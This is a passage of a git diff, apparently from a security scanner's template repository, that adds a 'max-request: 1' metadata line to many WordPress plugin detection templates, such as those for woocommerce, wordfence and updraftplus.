a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ 